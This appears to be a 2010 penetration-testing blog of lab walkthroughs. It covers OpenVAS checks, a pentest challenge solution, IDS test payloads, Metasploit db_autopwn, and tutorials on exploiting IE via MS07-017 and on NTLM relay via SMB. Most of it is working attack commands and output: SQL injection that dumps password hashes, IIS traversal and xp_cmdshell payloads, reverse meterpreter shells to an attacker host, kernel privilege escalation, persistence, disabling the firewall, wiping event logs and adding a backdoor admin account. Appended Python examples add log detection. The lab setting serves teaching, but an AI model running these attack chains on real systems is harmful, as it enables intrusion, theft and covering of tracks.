Monday, December 6, 2010

OpenVAS Client & Server Connection

OpenVAS Vulnerability Scanner is one of the most advanced open-source vulnerability scanners available today. For various reasons, you may find that the OpenVAS server (openvassd) does not run as expected after loading all of its plugins.

To check the OpenVAS client and server connection, we can issue this command:

root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)

OpenVAS server listens on TCP port 9390 by default.
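An added example (not from the original post) that turns the manual check above into a script: it parses `lsof -i` output and reports whether anything listens on TCP 9390 and which commands hold established connections to it. LSOF_SAMPLE is the listing shown above embedded as a constant; run `lsof -i` yourself and feed its output to `openvas_status` for a live check.

```python
"""Added example (not from the original post): check `lsof -i` output for an
openvassd listener on TCP 9390 and any client connected to it. LSOF_SAMPLE is
the listing shown in the post, embedded as a constant so the check runs offline."""
import re

LSOF_SAMPLE = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)
"""

# COMMAND PID USER ... NODE NAME [(STATE)]; the middle columns vary between
# lsof builds, so anchor on the protocol column instead of counting fields.
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+.*?\s(TCP|UDP)\s+(\S+)(?:\s+\((\w+)\))?$")

def parse_lsof(text):
    """Parse `lsof -i` rows into dicts; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        m = ROW_RE.match(line)
        if not m:
            continue
        cmd, pid, user, proto, name, state = m.groups()
        local, _, remote = name.partition("->")   # remote is '' for listeners
        rows.append({"command": cmd, "pid": int(pid), "user": user, "proto": proto,
                     "local": local, "remote": remote, "state": state or ""})
    return rows

def port_of(endpoint):
    """Port (or service name such as 'nessus') from 'host:port'."""
    return endpoint.rsplit(":", 1)[-1]

def openvas_status(text, port="9390"):
    """Report whether something listens on `port` and which commands have
    established connections to it."""
    rows = parse_lsof(text)
    listeners = [r for r in rows if r["proto"] == "TCP" and r["state"] == "LISTEN"
                 and port_of(r["local"]) == port]
    clients = [r for r in rows if r["state"] == "ESTABLISHED"
               and port_of(r["remote"]) == port]
    return {"listening": bool(listeners),
            "listener_pid": listeners[0]["pid"] if listeners else None,
            "listener_command": listeners[0]["command"] if listeners else None,
            "client_commands": sorted(r["command"] for r in clients)}

if __name__ == "__main__":
    print(openvas_status(LSOF_SAMPLE))
```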

Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

Monday, November 22, 2010

IDS Testing (Samples)

TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
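From the IDS side, the web attack, IIS Unicode directory traversal and MS-SQL injection tests above should all produce alerts. The following is an added example (not part of the original post) of the detection logic an IDS or log monitor needs for them, run over constructed web-server log lines; it decodes the request repeatedly so the double-encoded `%255c` is seen as a backslash, which is the detail that makes the traversal test interesting. The log format, rule names and sample lines are assumptions.

```python
"""Added example (not part of the original post): a small detector for the
web-attack, IIS Unicode traversal and MS-SQL injection tests above, run over
constructed web-server log lines. Log format and rule names are assumptions."""
import re
from urllib.parse import unquote

# Constructed sample log (combined-log style), one request per line.
SAMPLE_LOG = """\
131.107.1.252 - - [22/Nov/2010:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512
131.107.1.252 - - [22/Nov/2010:10:01:05 +0800] "GET /.htaccess HTTP/1.1" 403 0
131.107.1.252 - - [22/Nov/2010:10:01:09 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1" 200 1340
131.107.1.252 - - [22/Nov/2010:10:01:12 +0800] "GET /index.asp?newscode=1%20having%201=1%20-- HTTP/1.1" 500 233
131.107.1.252 - - [22/Nov/2010:10:01:15 +0800] "GET /index.asp?newscode=1;exec%20master..xp_cmdshell%20'dir%20c:\\';-- HTTP/1.1" 500 233
131.107.1.252 - - [22/Nov/2010:10:02:00 +0800] "GET /robots.txt HTTP/1.1" 200 40
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def fully_decode(uri, rounds=3):
    """Undo repeated percent-encoding: ..%255c.. -> ..%5c.. -> ..\\.. ; IIS
    decoded twice, which is why the traversal worked, so the detector must too."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri.lower()

# (rule name, pattern applied to the fully decoded, lower-cased URI)
RULES = [
    ("traversal", re.compile(r"\.\.[\\/]")),
    ("cmd_exec", re.compile(r"cmd\.exe|xp_cmdshell")),
    ("sqli", re.compile(r"'|\bhaving\s+1=1|\bgroup\s+by\b|;\s*(update|exec)\b|--")),
    # robots.txt is normally benign; it is listed because the tests above request it.
    ("file_probe", re.compile(r"/(\.htaccess|robots\.txt)$")),
]

def detect(log_text):
    """Return [(rule_name, raw_uri)] for every request that matches a rule;
    a single request can match several rules."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = fully_decode(m.group("uri"))
        hits.extend((name, m.group("uri")) for name, pat in RULES if pat.search(decoded))
    return hits

if __name__ == "__main__":
    for rule, uri in detect(SAMPLE_LOG):
        print(f"{rule:10} {uri}")
```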
Monday, November 15, 2010

Metasploit Autopwn with Nessus

Use the SQLite3 database driver
msf > db_driver sqlite3

Create the "pentest" database
msf > db_create pentest

Import the Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus

Display matching exploit modules
msf > db_autopwn -t -x

Launch matching exploits
msf > db_autopwn -e -x -r

Display open sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068

msf > sessions -l

msf > sessions -i 1

Tuesday, September 28, 2010

Tutorial: Exploiting IE with Windows Animated Cursor Vulnerability (MS07-017)

Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)

Step 1: Create a resource file in the /sources directory

root@bt:~# nano /sources/ie_ani

Enter the following as the contents of the ie_ani file.

use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit

Press Ctrl-X and Y, then press Enter to save the file.

Step 2: Launch Metasploit from its working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani

resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.

Step 3: Launch Internet Explorer (IE) on your target machine

Type the following in the address bar:

http://192.168.1.252/you_win

Switch back to your machine and check whether you have received the connection from the target.
Once connected, you can continue to interact with Meterpreter.

msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010

Press Enter to check the opened sessions.

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser

meterpreter > getprivs

============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5

Escalate our privileges
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---


[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM

meterpreter > getprivs

============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt

Maintain access by uploading a Meterpreter agent
meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back


[-] Error in script: LocalJumpError unexpected return

meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc

Exit from the target system.

meterpreter > exit

Step 4: Create a listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010

Clearing tracks (housekeeping)
meterpreter > run disable_audit

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > run getcountermeasure -h

Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.

meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

meterpreter > clearev

[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...

Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc

meterpreter > shell

Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.

C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.


C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y

meterpreter > ipconfig


MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

meterpreter >

Remote Desktop Connection

Open a new shell console, and run Remote Desktop client to connect to the target machine.

root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tutorial: NTLM Authentication Hijack with SMB Relay

Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)

Step 1: Prepare the SMB Exploit on Local Host

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/smb/smb_relay

msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit

Step 2: Connect to the FAKE shared folder from the remote machine

\\192.168.1.252\shared\xxx.jpg

shared\xxx.jpg is a fake path; it does not need to exist.

Step 3: Interact with the open session

Wait until you have received the connection from the target machine.
Once connected, wait a few minutes, then press Enter.

Check the active sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118

Interact with active session #1
msf > sessions -i 1

[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>